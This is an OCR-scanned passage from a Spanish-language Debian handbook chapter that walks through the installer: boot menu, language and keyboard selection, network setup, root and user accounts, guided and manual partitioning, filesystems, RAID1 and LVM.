y  «EI  gestor  de  arranque  e  inicio  dual»  pagina  72). 

Si  ya  tiene  un  sistema  Windows  funcionando  puede  inclusive  evitar  utilizar  un  CD- 
ROM;  Debian  ofrece  un  programa  para  Windows  que  descargara  un  instalador  De¬ 
bian  ligero  y  lo  configurara  en  el  disco  duro.  Luego,  solo  necesita  reiniciar  el  equi¬ 
po  y  seleccionar  entre  un  arranque  normal  de  Windows  o  iniciar  el  programa  de 
instalacion.  Tambien  podra  encontrarlo  en  un  sitio  web  dedicado  con  un  nombre 
bastante  exph'cito... 


»•  http : //ftp . debian . org/debian/tools/win32 -  loader/stable/ 


•-  http : //www. goodbye -micro soft . com/ 
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VOLVER  A  LOS  CIMIENTOS  El  gestor  de  arranque  es  un  programa  de  bajo  nivel  que  es  responsable  de  arran- 

Gestor  de  arranque  car  e'  nl-lcleo  Linux  despues  que  el  BIOS  le  cede  el  control.  Para  encargarse  de  esta 

tarea  debe  poder  ubicar  en  el  disco  al  kernel  Linux  a  arrancar.  Los  programas  mas 
utilizados  en  las  arquitecturas  i386  y  amd64  para  esta  tarea  son  LILO,  el  mas  anti- 
guo  de  los  dos,  y  GRUB  su  reemplazo  moderno.  Isolinux  y  Syslinux  son  alternativas 
utilizadas  frecuentemente  para  arrancar  desde  medios  removibles. 


Cada  elemento  del  menu  esconde  una  lrnea  de  ordenes  especffica  para  el  arraque  que  puede  ser 
configurada  segun  sea  necesario  presionando  la  tecla  TAB  antes  de  validarlo  y  arrancar.  El  menu 
«Ayuda»  muestra  la  interfaz  de  lmea  de  ordenes  antigua,  donde  las  teclas  FI  a  FI 0  muestran 
diferentes  pantallas  de  ayuda  que  detallan  las  opciones  disponibles.  Rara  vez  necesitara  utilizar 
esta  opcion  salvo  casos  muy  especfficos. 

El  modo  «experto»  (disponible  en  el  menu  «Opciones  avanzadas»)  detalla  todas  las  posibles  op- 
ciones  en  el  proceso  de  instalacion  y  permite  navegar  entre  los  varios  pasos  en  lugar  de  que 
estos  ocurran  de  forma  automatica  y  secuencial.  Tenga  cuidado,  este  modo  puede  ser  confuso 
debido  a  la  cantidad  de  opciones  de  configuracion  que  ofrece. 


_Debian  GNU/Linux  installer  boot  menu 


Instal  1 

64  bit  install 
Graphical  install 

64  bit  graphical  i 

Advanced  options 
Help 


debian 


GNU/Linux 


Install  with  speech  synthesis 
64  bit  speech  install 


Press  ENTER  to  boot  or  TAB  to  edit  a  menu  entry 


Figura  4.1  Pantalla  de  arranque 


Una  vez  iniciado,  el  programa  de  instalacion  le  guiara  a  traves  del  proceso  paso  a  paso.  Esta  sec- 
cion  presenta  cada  uno  de  estos  pasos  en  detalle.  Seguiremos  aqui  el  proceso  de  una  instalacion 
desde  un  DVD-ROM  multiarquitectura  (mas  especificamente,  la  version  beta4  del  instalador  pa- 
rajessie);  las  instalaciones  netinst,  asf  como  tambien  la  version  final  del  instalador  pueden  verse 
ligeramente  distintas.  Tambien  abordaremos  la  instalacion  en  modo  grafico,  pero  difiere  de  la 
instalacion  «clasica»  (modo  texto)  solo  en  su  apariencia. 
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4.2.2  Seleccion  del  idioma 


El  programa  de  instalacion  comienza  en  ingles,  pero  en  el  primer  paso  del  mismo  se  permite 
al  usuario  elegir  el  idioma  que  sera  utilizado  durante  el  resto  del  proceso  de  instalacion.  Por 
ejemplo,  al  elegir  el  idioma  frances  el  proceso  de  instalacion  sera  traducido  a  frances  (y  como 
resultado  el  sistema  configurado  en  frances).  Esta  eleccion  se  utiliza  para  definir  opciones  pre- 
determinadas  mas  relevantes  en  las  fases  subsiguientes  del  proceso  de  instalacion  (como  la  dis- 
tribucion  del  teclado). 


VOLVER  A  LOS  CIMIENTOS  Algunos  pasos  del  proceso  de  instalacion  requieren  que  ingrese  informacion.  Estas 
Navegacion  mediante  pantallas  tienen  varias  areas  que  pueden  «obtener  el  foco»  (areas  de  entrada  de 

teclado  texto,  cajas  de  confirmacion,  listas  de  opciones,  botones  para  confirmar  o  cancelar) 

y  la  tecla  TAB  le  permite  moverse  de  una  a  otra. 

En  el  modo  grafico,  puede  utilizar  el  raton  como  lo  haria  normalmente  en  un  escri- 
torio  grafico  ya  instalado. 


Choose  the  language  to  b 
default  language  for  the  in 

Language: 

Punjabi  (Gurmukhi) 
Romanian 
Russian 

Serbian  (Cyrillic) 

Sinhala 
Slovak 
Slovenian 

Swedish 
Tagalog 
Tajik 
Tamil 

Thai 
Tibetan 

Screenshot 


Romans 

PyccKiiii 

Slovencina 

Slovenscina 


Svenska 

Tagalog 

TO*CHKM 

ajiBjji 

jvrtnTviB 


[II]  Seleccione  u 


Latvian 

Lithuanian 

Macedonian 

Northern  Sami 

Norwegian  Bokmaal 

Norwegian  Nynorsk 

Persian 

Polish 

Portuguese 

Portuguese  (Brazil) 

Romanian 

Russian 

Serbian  (Cyrillic) 

Slovak 

Slovenian 


Latviski 

Lietuviskai 

MakeaoHCkw 

Samegillii^ 

Norsk  bokmal 
Norsk  nynorsk 

Polski 

Portugues 

Portugues  do  Brasil 

Romania 

PyCCKMM 

CpnCKM 

Slovencina 

Slovenscina 


Swedish 

Tagalog 

Tajik 

Thai 

Turkish 

Ukrainian 

Uyghur 


Svenska 

Tagalog 

ToqwKM 

nitnlmi 

TiirkQe 

ykpalHCbka 


<Space>  selects;  <Enter>  activates  buttor 


Figura4.2  Seleccion  del  idioma 


4.2.3  Seleccion  del  pals 

El  segundo  paso  consiste  en  elegir  su  pals.  Combinada  con  el  idioma,  esta  informacion  le  permite 
al  programa  ofrecer  la  distribucion  de  teclado  mas  apropiada.  Tambien  tendra  influencia  en  la 
configuracion  de  la  zona  horaria.  En  los  Estados  Unidos  se  sugerira  un  teclado  QWERTY  estandar 
y  las  opciones  de  zonas  horarias  apropiadas. 
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Figura4.3  Selection  del  pais 


4.2.4  Seleccion  de  la  distribucion  de  teclado 

El  teclado  propuesto  «American  English))  corresponde  a  la  distribucion  QWERTY  usual. 


Panyabi 

Rumano 

Serbio  (drflico) 

Cingales 

Eslovaco 

Esloveno 

Frances  suizo 
Aleman  suizo 
Tayiko 
Tamil 

Tailandes 

Tibetano 

Capturar  la  pantalla 


Figura  4.4  Election  de  teclado 


4.2.5  Deteccion  de  hardware 

Este  paso  es  completamente  automatico  en  la  gran  mayoria  de  los  casos.  El  instalador  detecta  su 
hardware  e  intenta  identificar  el  dispositivo  CD-ROM  a  utilizar  para  acceder  a  su  contenido.  Car- 
ga  los  modulos  correspondientes  a  los  componentes  de  hardware  detectados  y  luego  «monta»  el 
CD-ROM  para  poder  leerlo.  Los  pasos  previos  estaban  completamente  contenidos  en  la  imagen 
incluida  en  el  CD,  un  archivo  de  tamano  limitado  y  cargado  en  memoria  por  el  BIOS  al  arrancar 
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desde  el  CD. 


El  instalador  funciona  con  la  gran  mayorfa  de  los  dispositivos,  especialmente  perifericos  estan- 
dar  AT  API  (a  veces  llamados  IDE  y  EIDE).  Sin  embargo,  si  falla  la  deteccion  de  la  lectora  de  CD- 
ROM,  el  instalador  ofrecera  la  opcion  de  cargar  los  modulos  para  el  nucleo  (por  ejemplo  desde 
una  Have  USB)  que  corresponden  al  controlador  del  CD-ROM. 


4.2.6  Carga  de  componentes 

Con  los  contenidos  del  CD  disponibles,  el  instalador  carga  todos  los  archivos  necesarios  para 
continuar  con  su  trabajo.  Esto  incluye  controladores  adicionales  para  el  resto  del  hardware  (es¬ 
pecialmente  la  placa  de  red)  asf  como  tambien  todos  los  componentes  del  programa  de  instala¬ 
cion. 


4.2.7  Deteccion  de  hardware  de  red 

Este  paso  automatico  intenta  identificar  la  placa  de  red  y  cargar  el  modulo  correspondiente.  Si 
falla  la  deteccion  automatica  puede  seleccionar  el  modulo  a  cargar  manualmente.  Si  no  funciona 
ningun  modulo  es  posible  cargar  un  modulo  especifico  de  dispositivos  removibles.  Esta  ultima 
solucion  generalmente  solo  es  necesaria  cuando  el  controlador  adecuado  no  esta  incluido  en  el 
nucleo  Linux  estandar  pero  esta  disponible  en  otro  lado,  como  el  sitio  web  del  fabricante. 

Este  paso  tiene  que  ser  exitoso  obligatoriamente  para  las  instalaciones  netinst  ya  que  se  deben 
cargar  los  paquetes  Debian  desde  la  red. 


4.2.8  Configuracion  de  red 

Para  poder  automatizar  el  proceso  tanto  como  sea  posible,  el  instalador  intenta  configurar  la  red 
de  forma  automatica  con  DHCP  (para  IPv4)  y  utilizando  el  descubrimiento  de  redes  IPv6.  Si  eso 
falla  ofrece  mas  opciones:  intentar  nuevamente  con  una  configuracion  DHCP  normal,  intentar 
una  configuracion  DHCP  declarando  el  nombre  del  equipo  o  configurar  la  red  de  forma  estatica. 

La  ultima  opcion  necesita  una  direccion  IP,  una  mascara  de  red,  una  direccion  IP  para  una  posible 
puerta  de  enlace,  un  nombre  de  equipo  y  un  nombre  de  dominio. 


SUCERENCIA  Si  la  red  local  tiene  un  servidor  DHCP  que  no  desea  utilizar  porque  prefiere  configu- 
Configuracion  sin  DHCP  rar  una  direccion  IP  estatica  para  el  equipo  durante  la  instalacion,  puede  agregar  la 

opcion  netcfg/use_dhcp=false  al  arrancar  desde  el  CD-ROM.  Solo  necesita  se¬ 
leccionar  el  elemento  del  menu  que  desea  utilizar,  presionar  la  tecla  TAB  y  agregar 
esta  opcion  antes  de  presionar  la  tecla  Enter. 
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CUIDADO 

No  improvise 


Muchas  redes  locales  estan  basadas  en  la  premisa  implicita  que  se  puede  confiar 
en  todos  los  equipos,  la  configuracion  inadecuada  en  un  solo  equipo  generalmente 
perturbara  toda  la  red.  Como  resultado,  no  conecte  su  equipo  a  una  red  sin  antes 
acordar  las  configuraciones  adecuadas  con  el  administrador  (por  ejemplo,  la  direc- 
cion  IP,  mascara  de  red  y  direccion  de  difusion). 


4.2.9  Contrasena  del  administrador 

La  cuenta  de  superusuario  «root»,  reservada  para  el  administrador  del  equipo,  sera  creada  au- 
tomaticamente  durante  la  instalacion;  por  ello  se  solicita  una  contrasena.  El  instalador  la  pre- 
guntara  por  una  confirmacion  de  la  contrasena  para  prevenir  cualquier  error  en  la  entrada  que 
luego  seria  dificil  de  corregir. 


:  CJ  debians 


Configurar  usuarios  y  contrasenas 

Necesita  definir  una  contrasena  para  el  superusuario  («root»),  la  cuenta  de  administracion  del  sistema. 
Podrla  tener  graves  consecuencias  que  un  usuario  malicioso  o  un  usuario  sin  la  debida  cualificacion 
tuviera  acceso  a  la  cuenta  del  administrador  del  sistema,  as!  que  debe  tener  cuidado  y  elegir  un  la 
contrasena  para  el  superusuario  que  no  sea  facil  de  adivinar.  No  deberla  ser  una  palabra  que  se 
encuentre  en  el  diccionario,  o  una  palabra  que  pueda  asociarse  facilmente  con  usted. 

Una  buena  contrasena  debe  contener  una  mezcla  de  letras,  numeros  y  signos  de  puntuacion,  y  debe 
cambiarse  regularmente. 

La  contrasena  del  usuario  «root»  (administrador)  no  deberla  estar  en  bianco.  Si  deja  este  valor  en 
bianco,  entonces  se  deshabilitara  la  cuenta  de  root  creara  una  cuenta  de  usuario  a  la  que  se  le  daran 
permisos  para  convertirse  en  usuario  administrador  utilizando  la  orden  «sudo». 

Tenga  en  cuenta  que  no  podra  ver  la  contrasena  mientras  la  introduce. 

Clave  del  superusuario: 

•••••• 

Por  favor,  introduzca  la  misma  contrasena  de  superusuario  de  nuevo  para  verificar  que  la  introdujo 
correctamente. 

Vuelva  a  introducir  la  contrasena  para  su  verificacion: 

[  ••••••! 


Capturar  la  pantalla  Retroceder  Continuar 


Figura  4.5  Contrasena  del  administrador 

SEGURIDAD 

La  contrasena  del  usuario  root  deberla  ser  larga  (8  caracteres  o  mas)  e  imposible 

Contrasena  del 
administrador 

de  adivinar.  De  hecho,  cualquier  equipo  (y  cualquier  servidor  a  fortiori)  conectado 
a  internet  es  objetivo  regular  de  intentos  automaticos  de  conexion  con  las  contra- 
senas  mas  obvias.  A  veces  inclusive  sera  sujeto  a  ataques  de  diccionario  en  el  que 
se  probaran  como  contrasena  muchas  combinaciones  de  palabras  y  numeros.  Evite 
utilizar  nombres  de  hijos  o  padres,  fechas  de  nacimiento,  etc.:  muchos  de  sus  com- 
paneros  de  trabajo  podrlan  conocerlos  y  rara  vez  deseara  proveerles  acceso  libre  al 
equipo  en  cuestion. 

Estos  comentarios  son  igualmente  aplicables  para  contrasenas  de  otros  usuarios, 
pero  las  consecuencias  de  una  cuenta  comprometida  son  menos  drasticas  para 
usuarios  sin  permisos  de  administracion. 

Si  le  falta  inspiracion  no  dude  en  utilizar  generadores  de  contrasenas  como  pwgen 
(en  el  paquete  del  mismo  nombre). 
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4.2.10.  Creadon  del  primer  usuario 

Debian  tambien  impone  la  creacion  de  una  cuenta  de  usuario  estandar  para  que  el  administra- 
dor  no  adquiera  el  mal  habito  de  trabajar  como  root.  La  norma  basica  de  precaucion  significa 
esencialmente  que  se  realiza  cada  tarea  con  los  permisos  minimos  necesarios  para  limitar  el  da- 
no  que  pueda  causar  un  error  humano.  Es  por  esto  que  el  instalador  pedira  el  nombre  completo 
de  su  primer  usuario,  su  nombre  de  usuario  y  su  contrasena  (dos  veces  para  evitar  el  riesgo  de 
entradas  erroneas). 


:  CJ  debian8 


Configurar  usuarios  y  contrasenas 

Se  creara  una  cuenta  de  usuario  para  que  la  use  en  vez  de  la  cuenta  de  superusuario  en  sus  tareas  que 
no  sean  administrativas. 

Por  favor,  introduzca  el  nombre  real  de  este  usuario.  Esta  informacion  se  usara,  por  ejemplo,  como  el 
origen  predeterminado  para  los  correos  enviados  por  el  usuario  o  como  fuente  de  informacion  para  los 
programas  que  muestren  el  nombre  real  del  usuario.  Su  nombre  completo  es  una  eleccion  razonable. 

Nombre  completo  para  el  nuevo  usuario: 

[Adria  Garda-AIzorriz 
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Figura  4.6  Nombre  del  primer  usuario 


4.2.11.  Configuration  del  reloj 

Si  la  red  se  encuentra  disponible,  el  reloj  interno  del  sistema  es  actualizado  (por  unica  vez)  desde 
un  servidor  NTP.  De  esta  forma,  la  marcas  temporales  en  los  registros  seran  correctas  desde  el 
primer  arranque.  Para  que  se  mantengan  consistentes  en  el  tiempo  es  necesario  configurar  un 
demonio  NTP  luego  de  la  instalacion  inicial  (revise  la  Seccion  8.9.2,  «Sincronizacion  de  tiempo» 

pagina  179). 


4.2.12.  Deteccion  de  discos  y  otros  dispositivos 

Este  paso  detecta  automaticamente  los  discos  duros  en  los  que  se  podria  instalar  Debian.  Seran 
presentados  en  el  proximo  paso:  particionado. 
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4.2.13.  Inicio  de  la  herramienta  de  particionado 


CULTURA  El  particionado,  un  paso  indispensable  en  la  instalacion,  consiste  en  dividir  el  es- 
Usos  del  particionado  Paci°  disponible  en  los  discos  duros  (cada  subdivision  de  los  mismos  es  llamada 
«particion»)  segun  los  datos  que  seran  almacenados  en  el  y  el  uso  propuesto  para 
el  equipo.  Este  paso  tambien  incluye  elegir  los  sistemas  de  archivo  que  seran  utili- 
zados.  Todas  estas  decisiones  influiran  en  el  rendimiento,  la  seguridad  de  los  datos 
y  el  administrador  del  servidor. 


El  paso  de  particionado  es  tradicionalmente  dificil  para  usuarios  nuevos.  Es  necesario  definir 
varias  porciones  del  disco  (o  «particiones»)  en  las  que  se  almacenaran  los  sistemas  de  archivos 
Linux  y  la  memoria  virtual  («swap»).  Esta  tarea  es  mas  complicada  si  el  equipo  ya  posee  otro 
sistema  operativo  que  desea  conservar.  Efectivamente,  tendra  que  asegurarse  de  modificar  sus 
particiones  (o  que  las  redimensione  sin  causar  danos). 

Afortunadamente,  el  software  de  particionado  tiene  un  modo  «guiado»  que  recomienda  las  par¬ 
ticiones  que  debe  crear  el  usuario  —  en  la  mayoria  de  los  casos  puede  simplemente  aceptar  las 
sugerencias  del  software. 


-  C  debian® 


Particionado  de  discos 

Este  instalador  puede  guiarle  en  el  particionado  del  disco  (utilizando  distintos  esquemas  estandar)  o,  si 
lo  desea,  puede  hacerlo  de  forma  manual.  Si  escoge  el  sistema  de  particionado  guiado  tendra  la 
oportunidad  mas  adelante  de  revisary  adaptar  los  resultados. 

Se  le  preguntara  que  disco  a  utilizar  si  elige  particionado  guiado  para  un  disco  completo. 

Metodo  de  particionado: 
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Figura  4.7  Election  del  modo  de  particionado 


La  primera  pantalla  en  la  herramienta  de  particionado  ofrece  la  opcion  de  utilizar  un  disco  duro 
completo  para  crear  varias  particiones.  Para  un  equipo  (nuevo)  que  solamente  utilizara  Linux 
esta  es  claramente  la  mas  simple,  y  puede  elegir  la  opcion  «Guiado  -  utilizar  todo  el  disco».  Si 
el  equipo  tiene  dos  discos  duros  para  dos  sistemas  operativos,  definir  un  disco  para  cada  uno 
tambien  es  una  solucion  que  facilitara  el  particionado.  En  ambos  casos,  la  pantalla  siguiente  le 
ofrecera  elegir  el  disco  en  el  que  instalar  Linux  seleccionando  la  opcion  correspondiente  (por 
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ejemplo  «SCSI1  (0,0,0)  (sda)  - 12.9  GB  ATA  VBOX  HARDDISK»).  Luego  comenzara  el  particionado 
guiado. 


:  O  debian8 


Particionado  de  discos 

Tenga  en  cuenta  que  se  borraran  todos  los  datos  en  el  disco  que  ha  seleccionado.  Este  borrado  no  se 
realizara  hasta  que  confirme  que  realmente  quiere  hacer  los  cambios. 

Elija  disco  a  particionar: 


Capturar  la  pantalla  Retroceder  Continuar 


Figura  4.8  Disco  a  utilizar  para  el  particionado  guiado 


El  particionado  guiado  tambien  puede  configurar  volumenes  logicos  LVM  en  lugar  de  particio- 
nes  (revise  mas  adelante).  Ya  que  el  resto  del  funcionamiento  es  el  mismo,  no  entraremos  en  los 
detalles  de  la  opcion  «Guiado  -  utilizar  todo  el  disco  duro  y  configurar  LVM»  (cifrado  o  no). 

En  otros  casos,  cuando  Linux  deba  trabajar  junto  a  otras  particiones  preexistentes,  necesitara 
seleccionar  el  particionado  manual. 


Particionado  guiado 


La  herramienta  de  particionado  guiado  ofrece  tres  metodos  de  particionado  que  corresponden 
a  distintos  usos. 
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O  debian8 


Particionado  de  discos 

Seleccionado  para  particionar: 

SCSI3  (0,0,0)  (sda)  -  ATA  VBOX  HARDDISK:  8.6  GB 

Este  disco  puede  particionarse  siguiendo  uno  o  varios  de  los  diferentes  esquemas  disponibles.  Si  no 
esta  seguro,  escoja  el  primero  de  ellos. 

Esquema  de  particionado: 


Capturar  la  pantalla 


Retroceder 


(jpntinuar 


Figura4.9  Particionado  guiado 


El  primer  metodo  es  llamado  «Todo  los  archivos  en  una  particion».  El  arbol  complete  del  sistema 
Linux  sera  almacenado  en  un  solo  sistema  de  archivos  que  corresponde  con  el  directorio  raiz  /. 
Este  particionado  simple  y  robusto  es  adecuado  para  sistemas  personales  o  con  un  solo  usuario. 
De  hecho,  se  crearan  dos  particiones:  la  primera  tendra  el  sistema  completo  y  la  segunda  la 
memoria  virtual  (swap). 

El  segundo  metodo,  «Particion  /  home/  separada»  es  similar  pero  divide  lajerarquia  de  archivos 
en  dos:  una  particion  contiene  el  sistema  Linux  (/)  y  la  segunda  contiene  los  «directorios  de 
usuario»  (es  decir,  los  datos  de  usuarios,  en  archivos  y  subdirectories  disponibles  en  /  home/). 

El  ultimo  metodo  de  particionado,  llamado  «Particiones  /home,  /va  r  y  /tmp  separadas»  es  apro- 
piada  para  servidores  y  sistemas  multiusuario.  Divide  el  arbol  de  archivos  en  muchas  particio¬ 
nes:  ademas  de  las  particiones  para  la  raiz  (/)  y  las  cuentas  de  usuario  (/home/),  tambien  creara 
particiones  para  datos  de  software  de  servidor  (/va  r/),  y  archivos  temporales  (/tmp/).  Estas  di- 
visiones  tiene  varias  ventajas.  Un  usuario  no  podra  bloquear  el  servidor  consumiendo  todo  el 
espacio  disponible  en  el  disco  duro  (solo  pueden  llenar  /tmp/  y  /home/).  Los  datos  de  demonios 
(especialmente  registros)  tampoco  podran  trabar  el  resto  del  sistema. 

VOLVER  A  LOS  CIMIENTOS  Un  sistema  de  archivos  define  la  forma  en  la  que  se  organizan  los  datos  en  el  disco 
Eleccion  de  un  sistema  de  duro.  Cada  sistema  de  archivos  existente  tiene  sus  meritos  y  limitaciones.  Algunos 
archivos  son  m^s  r°bustos,  otros  mas  efectivos:  si  conoce  bien  sus  necesidades  es  posible  ele- 
gir  el  sistema  de  archivos  mas  apropiado.  Ya  se  han  realizado  muchas  comparacio- 
nes;  pareceria  que  ReiserFS  es  particularmente  eficiente  para  leer  muchos  archivos 
pequenos;  XFS ,  en  cambio,  trabaja  mas  rapido  con  archivos  grandes.  Ext4,  el  siste¬ 
ma  de  archivos  predeterminado  para  Debian,  es  un  buen  punto  medio  basado  en  las 
tres  versiones  anteriores  de  sistemas  de  archivos  utilizados  en  Linux  historicamen- 
te  (ext  y  ext2  y  ext3).  ext4  supera  algunas  limitaciones  de  ext3  y  es  particularmente 
apropiado  para  discos  duros  de  gran  capacidad.  Otra  opcion  es  experimentar  con 
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el  prometedor  btrfs  que  incluye  muchas  funcionalidades  que  requeririan,  al  dia  de 
hoy,  utilizar  LVM  y/o  RAID. 

Un  sistema  de  archivos  con  registros  (como  ext3,  ext4,  btrfs,  reiserfs  o  xfs )  toma 
medidas  especiales  que  posibilitan  volver  a  un  estado  consistente  anterior  luego 
de  una  interrupcion  abrupta  sin  analizar  completamente  el  disco  entero  (como  era 
el  caso  con  el  sistema  ext2).  Esta  funcionalidad  se  lleva  a  cabo  manteniendo  un 
registro  que  describe  las  operaciones  a  realizar  antes  que  sean  ejecutadas.  Si  se 
interrumpe  una  operacion  sera  posible  «reproducirla»  desde  el  registro.  Por  el  otro 
lado,  si  la  interrupcion  ocurre  durante  una  actualizacion  del  registro,  simplemente 
se  ignora  el  ultimo  cambio  solicitado;  los  datos  almacenados  podrian  perderse  pero, 
como  los  datos  en  el  disco  no  han  cambiado,  se  mantuvieron  coherentes.  Esto  es 
nada  mas  y  nada  menos  que  el  mecanismo  transaccional  aplicado  al  sistema  de 
archivos. 


Luego  de  elegir  el  tipo  de  la  particion,  el  software  calculara  una  sugerencia  y  la  describira  en  la 
pantalla;  el  usuario  podra  modificarla  si  es  necesario.  Puede,  en  particular,  elegir  otro  sistema 
de  archivos  si  la  opcion  estandar  ( ext4 )  no  es  apropiada.  En  la  mayoria  de  los  casos,  sin  embargo, 
el  particionado  propuesto  es  razonable  y  se  lo  puede  aceptar  seleccionando  la  opcion  «Finalizar 
particionado  y  escribir  cambios  al  disco». 


-  debians 


Particionado  de  discos 

Este  es  un  resumen  de  las  particiones  y  puntos  de  montaje  que  tiene  configurados  actualmente.  Seleccione  una 
particion  para  modificar  sus  valores  (sistema  de  ficheros,  puntos  de  montaje,  etc.),  el  espacio  libre  para  ahadir  una 
particion  nueva  o  un  dispositivo  para  inicializar  la  tabla  de  particiones. 

Particionado  guiado 

Configurar  RAID  por  software 

Configurar  el  Gestor  de  Volumenes  Logicos  (LVM) 

Configurar  los  volumenes  cifrados 
Configurar  los  volumenes  iSCSI 

V  SCSI1  (0,0,0)  (sda)  -  8.6  GB  ATA  VBOX  HARDDISK 

>  #1  prim  aria  8.2  GB  f  ext  4  ^  / 

>  #5  logica  401.6  MB  f  intercambio  intercambio 

Deshacer  los  cambios  realizados  a  las  particiones 


Finalizar  el  particionado  y  escribir  los  cambios  en  el  disco 


|  Capturar  la  pantalla  |  |  Ayuda  Retroceder  Continuar 


Figura  4.10  Validation  del  particionado 


Particionado  manual 

El  particionado  manual  provee  mayor  flexibilidad,  permitiendole  al  usuario  seleccionar  el  pro- 
posito  y  tamano  de  cada  particion.  Lo  que  es  mas,  este  modo  es  inevitable  si  desea  utilizar  RAID 
por  software. 
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EN  LA  PRACTICA  Para  instalar  Debian  junto  aun  sistema  operativo  existente  (Windows  u  otro),  debe 
Reduciendo  una  tener  espacio  disponible  en  el  disco  duro  que  no  sea  utilizado  por  el  otro  sistema 
particion  Windows  Para  poder  crear  las  particiones  dedicadas  a  Debian.  En  la  mayoria  de  los  casos  esto 
significa  reducir  una  particion  Windows  y  reutilizar  el  espacio  liberado. 

El  instalador  Debian  permite  esta  operacion  si  utiliza  el  modo  de  particionado  ma¬ 
nual.  Solo  necesitara  elegir  la  particion  Windows  e  ingresar  su  nuevo  tamano  (esto 
funciona  igual  tanto  en  particiones  FAT  como  NTFS). 


La  primera  pantalla  mostrara  los  discos  disponibles,  sus  particiones  y  cualquier  espacio  libre  po- 
sible  que  no  haya  sido  particionado  aun.  Puede  seleccionar  cada  elemento  mostrado;  presionar 
la  tecla  Enter  mostrara  una  lista  con  las  acciones  posibles. 

Puede  borrar  todas  las  particiones  en  un  disco  al  seleccionarlo. 

Al  seleccionar  el  espacio  libre  en  un  disco  puede  crear  una  nueva  particion  manualmente.  Tam- 
bien  puede  hacerlo  con  el  particionado  guiado,  que  es  una  solucion  interesante  para  un  disco 
que  ya  contiene  otro  sistema  operativo  pero  que  podria  desear  particionar  para  Linux  de  forma 
estandar.  Revise  Seccion  4.2.13.1,  «Particionado  guiado»  pagina  63  para  mas  detalles  sobre  el 
particionado  guiado. 


VOLVER  A  LOS  CIMIENTOS  El  punto  de  montaje  es  el  arbol  de  directorios  que  albergara  el  contenido  del  sistema 

Punto  de  montaje  de  archivos  en  la  particion  seleccionada.  Por  lo  tanto,  una  particion  montada  en 

/home/  generalmente  esta  destinada  a  contener  la  informacion  de  los  usuarios. 

Cuando  el  directorio  se  llama  «/»  es  llamada  «ra/'z»  («root»)  del  arbol  de  archivos 
y,  por  lo  tanto,  la  raiz  de  la  particion  que  contendra  el  sistema  Debian  en  si. 


VOLVER  A  LOS  CIMIENTOS  La  memoria  virtual  le  permite  al  nucleo  Linux,  cuando  no  tiene  suficiente  memoria 

Memoria  virtual  «swap»  (RAM),  liberar  parte  de  ella  almacenando  las  partes  de  la  RAM  que  han  estado 

inactivas  por  un  tiempo  en  la  particion  swap  del  disco  duro. 

Para  simular  la  memoria  adicional  Windows  utiliza  un  archivo  swap  que  se  encuen- 
tra  directamente  en  el  sistema  de  archivos.  Por  otro  lado,  Linux  utiliza  una  particion 
dedicada  a  este  proposito,  de  ahi  el  termino  «particion  swap». 


Al  elegir  una  particion  puede  elegir  la  forma  en  la  que  la  va  a  utilizar: 

■  darle  formato  e  incluirla  en  el  arbol  de  archivos  eligiendo  un  punto  de  montaje; 

■  utilizarla  como  particion  swap; 

■  convertirla  en  un  «volumen  fisico  para  cifrado»  (para  proteger  la  confidencialidad  de  los 
datos  en  ciertas  particiones,  revise  abajo); 

■  convertirla  en  un  «volumen  fisico  para  LVM»  (se  discute  este  concepto  en  detalle  mas 
adelante  en  este  capitulo); 

■  utilizarla  como  dispositivo  RAID  (revise  mas  adelante  en  este  capitulo); 

■  tambien  puede  elegir  no  utilizarla  y,  por  lo  tanto,  no  modificarla. 
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Configuracion  de  dispositivos  multidisco  (RAID  por  software) 

Algunos  tipos  de  RAID  permiten  duplicar  la  informacion  almacenada  en  los  discos  duros  para 
evitar  la  perdida  de  datos  en  caso  de  que  uno  de  ellos  sufra  algun  problema  de  hardware.  RAID 
nivel  1  mantiene  una  copia  simple  e  identica  (replica,  «mirror»)  de  un  disco  duro  en  otro  dis- 
positivo  mientras  que  RAID  nivel  4  divide  datos  redundantes  en  varios  discos  permitiendo  la 
reconstruccion  completa  de  un  dispositivo  que  falle. 

Solo  describiremos  RAID  nivel  1  que  es  el  mas  simple  de  implementar.  El  primer  paso  incluye 
crear  dos  particiones  del  mismo  tamano  en  dos  discos  duros  distintos  y  utilizarlas  como  «volu- 
men  fisico  para  RAID». 

Luego  debe  seleccionar  «Configurar  RAID  por  software))  en  la  herramienta  de  particionado  pa¬ 
ra  combinar  estas  dos  particiones  en  un  nuevo  disco  virtual  y  seleccionar  «Crear  dispositivo 
MD»  en  la  pantalla  de  configuracion.  Luego  necesita  responder  una  serie  de  preguntas  sobre 
este  nuevo  dispositivo.  La  primera  pregunta  sobre  el  nivel  de  RAID  a  utilizar,  que  en  nuestro 
caso  sera  «RAID1».  La  segunda  pregunta  es  sobre  la  cantidad  de  dispositivos  activos  —  dos  en 
nuestro  caso,  que  es  la  cantidad  de  particiones  que  tienen  que  incluirse  en  este  dispositivo  MD. 
La  tercera  pregunta  sobre  la  cantidad  de  dispositivos  libres  —  0;  no  tenemos  planeado  agregar 
discos  adicionales  de  repuesto  en  caso  que  uno  de  los  discos  falle.  La  ultima  pregunta  requiere 
que  seleccione  las  particiones  para  el  dispositivo  RAID  —  estas  serian  las  dos  que  separo  para 
este  proposito  (asegurese  de  seleccionar  solamente  las  particiones  que  mencionen  «raid»  espe- 
cificamente). 

Nuevamente  en  el  menu  principal,  aparecera  un  nuevo  disco  «RAID».  Este  disco  se  presenta  con 
solo  una  particion  que  no  puede  ser  eliminada  pero  a  la  que  podemos  especificar  el  uso  que  le 
daremos  (como  con  cualquier  otra  particion). 

Para  mas  detalles  sobre  funciones  RAID,  revise  la  Seccion  12.1.1,  «RAID  por  software))  pagina 

322. 


Configuracion  del gestor  de  volumenes  logicos  (LVM) 

LVM  le  permite  crear  particiones  «virtuales»  a  traves  de  varios  discos.  Los  beneficios  son  dobles: 
el  tamano  de  las  particiones  no  estara  limitado  por  el  tamano  de  los  discos  individuales  sino  por 
el  del  conjunto  completo  y  podra  modificar  el  tamano  de  las  particiones  existentes  en  cualquier 
momento,  posiblemente  agregando  un  disco  adicional  cuando  lo  necesite. 

LVM  utiliza  una  terminologia  particular:  una  particion  virtual  es  un  «volumen  logico»,  que  es 
parte  de  un  «grupo  de  volumenes»  o  la  asociacion  de  varios  «volumenes  fisicos».  De  hecho,  ca- 
da  uno  de  esos  terminos  se  corresponde  con  una  particion  «real»  (o  dispositivo  de  RAID  por 
software). 

Esta  tecnica  funciona  de  una  forma  muy  simple:  se  divide  cada  volumen,  sea  logico  o  fisico,  en 
bloques  del  mismo  tamano  que  LVM  hace  que  coincidan.  Agregar  un  nuevo  disco  causara  la 
